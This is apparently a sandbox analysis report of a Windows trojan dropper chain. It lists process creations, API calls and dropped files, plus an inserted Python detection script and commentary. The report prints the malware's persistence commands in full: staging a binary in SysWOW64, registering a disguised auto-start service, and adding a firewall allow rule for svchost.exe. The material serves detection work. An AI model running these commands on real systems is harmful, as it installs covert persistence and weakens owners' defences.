                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 19_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 19_2_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_2_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
                      Source: 45AA.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: FC2A.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: B1B2.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 3A7E.exe.5.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: 7808.exe.5.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: 9789.exe.5.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: 3A7E.exe.5.drStatic PE information: Section: ZLIB complexity 1.00044194799
                      Source: 3A7E.exe.5.drStatic PE information: Section: ZLIB complexity 1.00537109375
                      Source: 3A7E.exe.5.drStatic PE information: Section: ZLIB complexity 1.00051229508
                      Source: 3A7E.exe.5.drStatic PE information: Section: ZLIB complexity 1.0107421875
                      Source: 54AF.exe.5.drStatic PE information: Section: .didata ZLIB complexity 0.999523355577
                      Source: 7808.exe.5.drStatic PE information: Section: ZLIB complexity 1.00044194799
                      Source: 7808.exe.5.drStatic PE information: Section: ZLIB complexity 1.00537109375
                      Source: 7808.exe.5.drStatic PE information: Section: ZLIB complexity 1.00051229508
                      Source: 7808.exe.5.drStatic PE information: Section: ZLIB complexity 1.0107421875
                      Source: 9789.exe.5.drStatic PE information: Section: ZLIB complexity 1.00044194799
                      Source: 9789.exe.5.drStatic PE information: Section: ZLIB complexity 1.00537109375
                      Source: 9789.exe.5.drStatic PE information: Section: ZLIB complexity 1.00051229508
                      Source: 9789.exe.5.drStatic PE information: Section: ZLIB complexity 1.0107421875
                      Source: OG9rNsihJ7.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vfgiwcs
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@60/37@100/15
Source: C:\Users\user\AppData\Local\Temp\3136.exeFile read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: OG9rNsihJ7.exeReversingLabs: Detection: 48%
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\OG9rNsihJ7.exe "C:\Users\user\Desktop\OG9rNsihJ7.exe"
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeProcess created: C:\Users\user\Desktop\OG9rNsihJ7.exe "C:\Users\user\Desktop\OG9rNsihJ7.exe"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\vfgiwcs C:\Users\user\AppData\Roaming\vfgiwcs
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsProcess created: C:\Users\user\AppData\Roaming\vfgiwcs C:\Users\user\AppData\Roaming\vfgiwcs
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B1B2.exe C:\Users\user\AppData\Local\Temp\B1B2.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\BFBD.exe C:\Users\user\AppData\Local\Temp\BFBD.exe
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6924 -ip 6924
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeProcess created: C:\Users\user\AppData\Local\Temp\BFBD.exe C:\Users\user\AppData\Local\Temp\BFBD.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6924 -s 520
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\254E.exe C:\Users\user\AppData\Local\Temp\254E.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3136.exe C:\Users\user\AppData\Local\Temp\3136.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3BC6.exe C:\Users\user\AppData\Local\Temp\3BC6.exe
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ffiawxs\
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe" C:\Windows\SysWOW64\ffiawxs\
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ffiawxs binPath= "C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d\"C:\Users\user\AppData\Local\Temp\3136.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ffiawxs "wifi internet conection
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ffiawxs
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: unknownProcess created: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d"C:\Users\user\AppData\Local\Temp\3136.exe"
                      Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess created: C:\Users\user\AppData\Local\Temp\3BC6.exe C:\Users\user\AppData\Local\Temp\3BC6.exe
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeProcess created: C:\Users\user\Desktop\OG9rNsihJ7.exe "C:\Users\user\Desktop\OG9rNsihJ7.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B1B2.exe C:\Users\user\AppData\Local\Temp\B1B2.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\BFBD.exe C:\Users\user\AppData\Local\Temp\BFBD.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\254E.exe C:\Users\user\AppData\Local\Temp\254E.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3136.exe C:\Users\user\AppData\Local\Temp\3136.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3BC6.exe C:\Users\user\AppData\Local\Temp\3BC6.exe
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\vfgiwcs | Process created: C:\Users\user\AppData\Roaming\vfgiwcs C:\Users\user\AppData\Roaming\vfgiwcs
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6924 -ip 6924
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6924 -s 520
Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\BFBD.exe | Process created: C:\Users\user\AppData\Local\Temp\BFBD.exe C:\Users\user\AppData\Local\Temp\BFBD.exe
Source: C:\Windows\SysWOW64\WerFault.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\3136.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ffiawxs\
Source: C:\Users\user\AppData\Local\Temp\3136.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe" C:\Windows\SysWOW64\ffiawxs\
Source: C:\Users\user\AppData\Local\Temp\3136.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ffiawxs binPath= "C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d\"C:\Users\user\AppData\Local\Temp\3136.exe\"" type= own start= auto DisplayName= "wifi support
Source: C:\Users\user\AppData\Local\Temp\3136.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ffiawxs "wifi internet conection
Source: C:\Users\user\AppData\Local\Temp\3136.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ffiawxs
Source: C:\Users\user\AppData\Local\Temp\3136.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Source: C:\Users\user\AppData\Local\Temp\3BC6.exe | Process created: C:\Users\user\AppData\Local\Temp\3BC6.exe C:\Users\user\AppData\Local\Temp\3BC6.exe
Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
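The six 3136.exe commands above are one complete service-install sequence: a directory is created under SysWOW64, the dropped binary is moved into it, registered as an auto-start service whose binPath also carries the dropper's own Temp path as an argument, started, and finally an inbound firewall allow rule is added for the 32-bit svchost.exe, with a rule name that mimics the Windows service-host description and a trailing `>nul` to hide output. The last row shows that service binary then spawning svchost.exe, the process the firewall rule was opened for. This is the classic Tofsee install chain. The following Python is an added example and not part of the sandbox report: it replays those command lines as constructed process-creation events and flags the three things a detection engineer would key on (a service binary staged by its own parent, a service definition that references a user-writable path, and a firewall allow rule for svchost.exe). The event tuples, rule names and the user-writable path patterns are assumptions made for the example.

```python
import ntpath
import re
from collections import defaultdict

# Constructed process-creation events (parent image, command line), modelled on the
# command lines the report lists for 3136.exe, plus one benign control event. The
# backslash-escaped quotes inside binPath= are kept exactly as the report shows them.
SAMPLE_EVENTS = [
    (r"C:\Users\user\AppData\Local\Temp\3136.exe",
     r'"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ffiawxs' "\\"),
    (r"C:\Users\user\AppData\Local\Temp\3136.exe",
     r'"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xqfkdfcl.exe" C:\Windows\SysWOW64\ffiawxs' "\\"),
    (r"C:\Users\user\AppData\Local\Temp\3136.exe",
     r'C:\Windows\System32\sc.exe" create ffiawxs binPath= "C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d\"C:\Users\user\AppData\Local\Temp\3136.exe\"" type= own start= auto DisplayName= "wifi support'),
    (r"C:\Users\user\AppData\Local\Temp\3136.exe",
     r'"C:\Windows\System32\sc.exe" start ffiawxs'),
    (r"C:\Users\user\AppData\Local\Temp\3136.exe",
     r'"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul'),
    # Benign control: an administrator installing a vendor agent from Program Files.
    (r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\System32\sc.exe" create VendorAgent binPath= "C:\Program Files\Vendor\agent.exe" start= auto'),
]

MKDIR_RE = re.compile(r'\bmkdir\s+"?([^"\s]+)', re.I)
MOVE_RE = re.compile(r"\bmove\b.*\s(\S+)\s*$", re.I)          # last token = destination
SC_CREATE_RE = re.compile(r'\bsc(?:\.exe)?"?\s+create\s+(\S+)', re.I)
BINPATH_RE = re.compile(r'binPath=\s*"?(.*)', re.I)
NETSH_ADD_RE = re.compile(r'\bnetsh(?:\.exe)?"?\s+advfirewall\s+firewall\s+add\s+rule\b', re.I)
PROGRAM_RE = re.compile(r'program="([^"]+)"', re.I)
# Assumed set of locations an unprivileged user can write to.
USER_WRITABLE_RE = re.compile(r"\\Users\\[^\\]+\\AppData\\|\\Temp\\|\\ProgramData\\", re.I)


def _norm_dir(path):
    return path.rstrip("\\").lower()


def split_binpath(cmdline):
    """Return (image, arguments) from an `sc create ... binPath=` command line, or None.
    The image is everything up to the first '.exe', which tolerates both the unquoted
    path-with-spaces form and the nested-quote form seen in the report."""
    m = BINPATH_RE.search(cmdline)
    if not m:
        return None
    rest = m.group(1)
    end = rest.lower().find(".exe")
    if end < 0:
        return rest.split()[0], ""
    return rest[:end + 4], rest[end + 4:]


def detect(events):
    """Return a list of (rule, parent_image, command_line) findings."""
    findings = []
    staged = defaultdict(set)  # parent image -> directories it created or moved files into
    for parent, cmd in events:
        m = MKDIR_RE.search(cmd)
        if m:
            staged[parent].add(_norm_dir(m.group(1)))
        m = MOVE_RE.search(cmd)
        if m:
            staged[parent].add(_norm_dir(m.group(1)))

        if SC_CREATE_RE.search(cmd):
            parsed = split_binpath(cmd)
            if parsed:
                image, args = parsed
                # The service binary lives in a directory this same parent just staged.
                if _norm_dir(ntpath.dirname(image)) in staged[parent]:
                    findings.append(("service_binary_staged_by_parent", parent, cmd))
                # Service arguments (or the installer itself) point at a user-writable path.
                if USER_WRITABLE_RE.search(args) or USER_WRITABLE_RE.search(parent):
                    findings.append(("service_references_user_writable_path", parent, cmd))

        if NETSH_ADD_RE.search(cmd) and re.search(r"\baction=allow\b", cmd, re.I):
            m = PROGRAM_RE.search(cmd)
            # Windows never needs a user-added allow rule for svchost.exe itself.
            if m and ntpath.basename(m.group(1)).lower() == "svchost.exe":
                findings.append(("firewall_allow_for_svchost", parent, cmd))
    return findings


if __name__ == "__main__":
    for rule, parent, cmd in detect(SAMPLE_EVENTS):
        print(f"[{rule}] parent={parent}\n    {cmd}")
```

The staging correlation is the part worth keeping in a real rule: `sc create` from an administrator's shell is common, but `sc create` whose binPath sits in a directory the same process created moments earlier almost never is. The `>nul` redirection and the mis-spelled description are good secondary indicators but too brittle to alert on alone.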
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\B1B2.tmp
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe | Code function: 0_2_00419C55 SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringW,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeap,WritePrivateProfileStringW,SetPriorityClass,
Source: C:\Users\user\AppData\Local\Temp\3BC6.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2272:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5580:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4560:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6924
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \BaseNamedObjects\Local\SM0:7020:64:WilError_01
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe | Command line argument: 0.0
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe | Command line argument: hijaduvinijebup
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe | Command line argument: mocisacatenu
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe | Command line argument: wapejan
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe | Command line argument: wovag
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe | Command line argument: cbH
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe | Command line argument: Piruvora
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe | Command line argument: gukafipa
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe | Command line argument: mawecamaxe
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe | Command line argument: Hiwejanoji
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe | Command line argument: Pusazide
Source: C:\Users\user\Desktop\OG9rNsihJ7.exe | Command line argument: hukujid
Source: C:\Users\user\AppData\Local\Temp\3136.exe | Command line argument: cbH
Source: C:\Users\user\AppData\Local\Temp\3136.exe | Command line argument: cbH
Source: 8017.exe.5.dr, Univesity_Grade_Calculator/Form1.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 3BC6.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 3BC6.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 30.0.3BC6.exe.650000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 30.0.3BC6.exe.650000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 30.0.3BC6.exe.650000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 30.0.3BC6.exe.650000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 30.2.3BC6.exe.650000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 30.2.3BC6.exe.650000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 30.0.3BC6.exe.650000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 30.0.3BC6.exe.650000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\B1B2.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: OG9rNsihJ7.exe | Static PE information: More than 200 imports for KERNEL32.dll
Source: OG9rNsihJ7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: OG9rNsihJ7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: OG9rNsihJ7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: OG9rNsihJ7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: OG9rNsihJ7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: OG9rNsihJ7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: OG9rNsihJ7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: msvcrt.pdbk source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb( source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355319445.0000000003678000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355100434.0000000003678000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355041486.000000000541B000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355698589.0000000003678000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: C:\xore salafoyukumabu3\ra.pdb source: 254E.exe, 0000001C.00000000.351672177.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.355300183.0000000003672000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.356247461.0000000003672000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000001A.00000003.361114549.0000000005910000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
                      Source: Binary string: AC:\xore salafoyukumabu3\ra.pdbh source: 254E.exe, 0000001C.00000000.351672177.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001A.00000003.361098362.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001A.00000003.361136768.0000000005917000.00000004.00000040.sdmp
